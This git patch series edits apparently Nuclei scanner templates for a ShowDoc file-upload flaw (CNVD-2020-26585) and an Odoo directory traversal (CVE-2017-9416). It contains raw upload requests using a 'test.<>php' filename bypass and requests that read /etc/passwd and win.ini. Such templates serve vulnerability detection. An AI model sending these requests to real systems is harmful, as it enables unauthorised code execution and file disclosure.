From 5de626ca848501e581aacc71b387734e8411077a Mon Sep 17 00:00:00 2001 From: Co5mos Date: Sat, 25 Mar 2023 01:35:29 +0800 Subject: [PATCH 1/6] Added CNVD-2020-26585 Template --- cnvd/2020/CNVD-2020-26585.yaml | 69 ++++++++++++++++++++++++++++++++++ 1 file changed, 69 insertions(+) create mode 100644 cnvd/2020/CNVD-2020-26585.yaml diff --git a/cnvd/2020/CNVD-2020-26585.yaml b/cnvd/2020/CNVD-2020-26585.yaml new file mode 100644 index 0000000000..ac60288a68 --- /dev/null +++ b/cnvd/2020/CNVD-2020-26585.yaml @@ -0,0 +1,69 @@ +id: CNVD-2020-26585 + +info: + name: Showdoc File Uploads + author: Co5mos + severity: critical + description: ShowDoc is an online API and technical documentation tool that is very suitable for IT teams. Showdoc has a file upload vulnerability, which attackers can exploit to gain server permissions. + reference: + - https://vul.wangan.com/a/CNVD-2020-26585 + - https://blog.csdn.net/qq_48985780/article/details/122211136 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L + cvss-score: 9.9 + cwe-id: CWE-434 + metadata: + verified: true + fofa-query: app="ShowDoc" + tags: showdoc,cnvd,cnvd2020,fileupload + +requests: + - raw: + - | + POST /index.php?s=/home/page/uploadImg HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + Content-Type: multipart/form-data; boundary=--------------------------921378126371623762173617 + Content-Length: 264 + + ----------------------------921378126371623762173617 + Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php" + Content-Type: text/plain + + + ----------------------------921378126371623762173617-- + + - | + GET /Public//Uploads//{{date}}//{{file}} HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + name: date + part: body + internal: true + group: 1 + regex: + - '(\d{4}-\d{2}-\d{2})\\/([a-f0-9]+\.php)' + + - type: regex + name: file + part: body + internal: true + group: 2 + regex: + - '(\d{4}-\d{2}-\d{2})\\/([a-f0-9]+\.php)' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "8e20346f3b8304b53f3b120c2b857742" + + - type: status + status: + - 200 From 7d23ba88b1776c00db052c8611d7e539dbb57620 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 25 Mar 2023 23:23:12 +0530 Subject: [PATCH 2/6] Delete CVE-2017-9416.yaml --- cves/2017/CVE-2017-9416.yaml | 41 ------------------------------------ 1 file changed, 41 deletions(-) delete mode 100644 cves/2017/CVE-2017-9416.yaml diff --git a/cves/2017/CVE-2017-9416.yaml b/cves/2017/CVE-2017-9416.yaml deleted file mode 100644 index ede23f11ac..0000000000 --- a/cves/2017/CVE-2017-9416.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CVE-2017-9416 - -info: - name: Odoo service authenticated - Directory Traversal - author: Co5mos - severity: medium - description: | - Directory traversal vulnerability in tools.file_open in Odoo 8.0, 9.0, and 10.0 allows remote authenticated users to read arbitrary local files readable by the Odoo service. - reference: - - https://www.cvedetails.com/cve/CVE-2017-9416/ - - https://github.com/odoo/odoo/issues/17394 - - https://nvd.nist.gov/vuln/detail/CVE-2017-9416 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 6.5 - cve-id: CVE-2017-9416 - cwe-id: CWE-22 - tags: cve2017,odoo,cve,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/base_import/static/c:/windows/win.ini" # windows - - "{{BaseURL}}/base_import/static/etc/passwd" # linux - - stop-at-first-match: true - matchers-condition: or - matchers: - - type: dsl - dsl: - - "regex('root:.*:0:0:', body)" - - "status_code == 200" - condition: and - - - type: dsl - dsl: - - "contains(body, 'bit app support')" - - "contains(body, 'fonts')" - - "contains(body, 'extensions')" - - "status_code == 200" - condition: and From d11ded468261765355a23b5be90328b742de736b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 25 Mar 2023 23:32:20 +0530 Subject: [PATCH 3/6] trailing-spaces fix --- cnvd/2020/CNVD-2020-26585.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cnvd/2020/CNVD-2020-26585.yaml b/cnvd/2020/CNVD-2020-26585.yaml index ac60288a68..705a931a07 100644 --- a/cnvd/2020/CNVD-2020-26585.yaml +++ b/cnvd/2020/CNVD-2020-26585.yaml @@ -28,7 +28,7 @@ requests: Connection: close Content-Type: multipart/form-data; boundary=--------------------------921378126371623762173617 Content-Length: 264 - + ----------------------------921378126371623762173617 Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php" Content-Type: text/plain @@ -39,7 +39,7 @@ requests: - | GET /Public//Uploads//{{date}}//{{file}} HTTP/1.1 Host: {{Hostname}} - + extractors: - type: regex name: date From ca3037cce532bf9a17ed1e17fc5453eb2f7ed640 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 31 Mar 2023 15:49:43 +0530 Subject: [PATCH 4/6] updated matcher and info --- cnvd/2020/CNVD-2020-26585.yaml | 63 +++++++++++++++++----------------- 1 file changed, 31 insertions(+), 32 deletions(-) diff --git a/cnvd/2020/CNVD-2020-26585.yaml b/cnvd/2020/CNVD-2020-26585.yaml index 705a931a07..0f11659f3e 100644 --- a/cnvd/2020/CNVD-2020-26585.yaml +++ b/cnvd/2020/CNVD-2020-26585.yaml @@ -1,13 +1,15 @@ id: CNVD-2020-26585 info: - name: Showdoc File Uploads - author: Co5mos + name: Showdoc <2.8.6 - File Uploads + author: pikpikcu,Co5mos severity: critical - description: ShowDoc is an online API and technical documentation tool that is very suitable for IT teams. Showdoc has a file upload vulnerability, which attackers can exploit to gain server permissions. + description: | + ShowDoc is an online API and technical documentation tool that is very suitable for IT teams. Showdoc has a file upload vulnerability, which attackers can exploit to gain server permissions. reference: - https://vul.wangan.com/a/CNVD-2020-26585 - https://blog.csdn.net/qq_48985780/article/details/122211136 + - https://github.com/star7th/showdoc/pull/1059 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L cvss-score: 9.9 @@ -15,55 +17,52 @@ info: metadata: verified: true fofa-query: app="ShowDoc" - tags: showdoc,cnvd,cnvd2020,fileupload + tags: cnvd,cnvd2020,showdoc,fileupload requests: - raw: - | POST /index.php?s=/home/page/uploadImg HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Type: multipart/form-data; boundary=--------------------------921378126371623762173617 - Content-Length: 264 + Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633 - ----------------------------921378126371623762173617 - Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php" + ----------------------------835846770881083140190633 + Content-Disposition: form-data; name="editormd-image-file"; filename="{{randstr}}.<>txt" Content-Type: text/plain - - ----------------------------921378126371623762173617-- + test{{randstr}} + ----------------------------835846770881083140190633-- - | GET /Public//Uploads//{{date}}//{{file}} HTTP/1.1 Host: {{Hostname}} - extractors: - - type: regex - name: date - part: body - internal: true - group: 1 - regex: - - '(\d{4}-\d{2}-\d{2})\\/([a-f0-9]+\.php)' - - - type: regex - name: file - part: body - internal: true - group: 2 - regex: - - '(\d{4}-\d{2}-\d{2})\\/([a-f0-9]+\.php)' - matchers-condition: and matchers: - type: word part: body words: - - "8e20346f3b8304b53f3b120c2b857742" + - "test{{randstr}}" - type: status status: - 200 + + extractors: + - type: regex + name: date + part: body + group: 1 + regex: + - '(\d{4}-\d{2}-\d{2})\\/([a-f0-9]+\.txt)' + internal: true + + - type: regex + name: file + part: body + group: 2 + regex: + - '(\d{4}-\d{2}-\d{2})\\/([a-f0-9]+\.txt)' + internal: true + +# Enhanced by mp on 2022/05/30 From e9f9081e24b538d0512d1fefd796bc944024713b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 31 Mar 2023 15:50:15 +0530 Subject: [PATCH 5/6] Delete showdoc-file-upload-rce.yaml --- .../other/showdoc-file-upload-rce.yaml | 49 ------------------- 1 file changed, 49 deletions(-) delete mode 100644 vulnerabilities/other/showdoc-file-upload-rce.yaml diff --git a/vulnerabilities/other/showdoc-file-upload-rce.yaml b/vulnerabilities/other/showdoc-file-upload-rce.yaml deleted file mode 100644 index 10f0f470eb..0000000000 --- a/vulnerabilities/other/showdoc-file-upload-rce.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: showdoc-file-upload-rce - -info: - name: Showdoc <2.8.6 - Remote Code Execution - author: pikpikcu - severity: critical - description: | - Showdoc versions before 2.8.6 is susceptible to remote code execution. - reference: - - https://github.com/star7th/showdoc/pull/1059 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 - tags: rce,fileupload,showdoc,oss,intrusive - -requests: - - raw: - - | - POST /index.php?s=/home/page/uploadImg HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633 - - ----------------------------835846770881083140190633 - Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php" - Content-Type: text/plain - - - ----------------------------835846770881083140190633-- - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"url":"http:' - - '"success":1' - condition: and - - - type: status - status: - - 200 - - extractors: - - type: json - json: - - '.url' - -# Enhanced by mp on 2022/05/30 From f3ca8fd92a6e8806166f7306f78902d6e212112e Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 31 Mar 2023 16:46:48 +0530 Subject: [PATCH 6/6] Create CVE-2017-9416.yaml --- cves/2017/CVE-2017-9416.yaml | 41 ++++++++++++++++++++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 cves/2017/CVE-2017-9416.yaml diff --git a/cves/2017/CVE-2017-9416.yaml b/cves/2017/CVE-2017-9416.yaml new file mode 100644 index 0000000000..ede23f11ac --- /dev/null +++ b/cves/2017/CVE-2017-9416.yaml @@ -0,0 +1,41 @@ +id: CVE-2017-9416 + +info: + name: Odoo service authenticated - Directory Traversal + author: Co5mos + severity: medium + description: | + Directory traversal vulnerability in tools.file_open in Odoo 8.0, 9.0, and 10.0 allows remote authenticated users to read arbitrary local files readable by the Odoo service. + reference: + - https://www.cvedetails.com/cve/CVE-2017-9416/ + - https://github.com/odoo/odoo/issues/17394 + - https://nvd.nist.gov/vuln/detail/CVE-2017-9416 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2017-9416 + cwe-id: CWE-22 + tags: cve2017,odoo,cve,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/base_import/static/c:/windows/win.ini" # windows + - "{{BaseURL}}/base_import/static/etc/passwd" # linux + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: dsl + dsl: + - "regex('root:.*:0:0:', body)" + - "status_code == 200" + condition: and + + - type: dsl + dsl: + - "contains(body, 'bit app support')" + - "contains(body, 'fonts')" + - "contains(body, 'extensions')" + - "status_code == 200" + condition: and